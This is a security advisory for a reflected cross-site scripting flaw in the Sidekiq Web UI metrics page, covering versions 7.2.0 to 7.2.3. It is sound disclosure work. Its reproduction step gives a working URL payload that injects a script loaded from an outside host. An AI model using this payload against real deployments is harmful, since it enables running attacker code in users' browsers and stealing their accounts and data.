GHSA-q655-3pj8-9fxq

Source
https://github.com/advisories/GHSA-q655-3pj8-9fxq
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-q655-3pj8-9fxq/GHSA-q655-3pj8-9fxq.json
Aliases
Published
2024-04-26T22:19:08Z
Modified
2024-05-01T13:15:59.950623Z
Details

Description:

During the source Code Review of the metrics.erb view of the Sidekiq Web UI, A reflected XSS vulnerability is discovered. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application.

This vulnerability can be exploited to target the users of the application, and users of other applications deployed on the same domain or website as that of the Sidekiq website. Successful exploit results may result in compromise of user accounts and user data.

Impact:

The impact of this vulnerability can be severe. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc.

Mitigation:

Encode all output data before rendering it in the response to prevent XSS attacks.

Steps to Reproduce:

  1. Go to the following URL of the sidekiq Web UI: https://{host}/sidekiq/metrics?substr=beret%22%3E%3Cscript%20src=%22https://cheemahq.vercel.app/a.js%22%20/%3E
  2. XSS payload will be executed, causing a popup.

Evidence:

image Figure 1: Source Code Vulnerable to XSS

image Figure 2: XSS payload triggered

References

Affected packages

RubyGems / sidekiq

Package

Name
sidekiq

Affected ranges

Type
ECOSYSTEM
Events
Introduced
7.2.0
Fixed
7.2.4

Affected versions

7.*

7.2.0
7.2.1
7.2.2
7.2.3